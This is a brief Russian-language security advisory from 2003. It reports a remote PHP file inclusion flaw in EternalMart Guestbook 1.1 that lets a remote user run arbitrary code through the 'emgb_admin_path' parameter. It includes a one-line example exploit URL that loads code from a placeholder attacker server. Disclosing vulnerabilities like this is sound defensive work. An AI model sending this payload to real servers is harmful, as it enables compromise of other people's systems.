Security Lab

Выполнение произвольного PHP кода в EternalMart Guestbook

Дата публикации:08.10.2003
Всего просмотров:1318
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: EternalMart Guestbook
Уязвимые версии: EternalMart Guestbook 1.1

Описание: Уязвимость обнаружена в EternalMart Guestbook. Злонамеренный пользователь может выполнить произвольный PHP код на системе.

Сценарий "auth_func.php" не проверяет местоположение PHP файла, включаемого в переменной "emgb_admin_path". В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

Пример/Эксплоит:

/admin/auth.php?emgb_admin_path=http://[evil_server]

URL производителя: http://www.eternalmart.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно найти на http://www.phpsecure.info.

Ссылки: EternalMart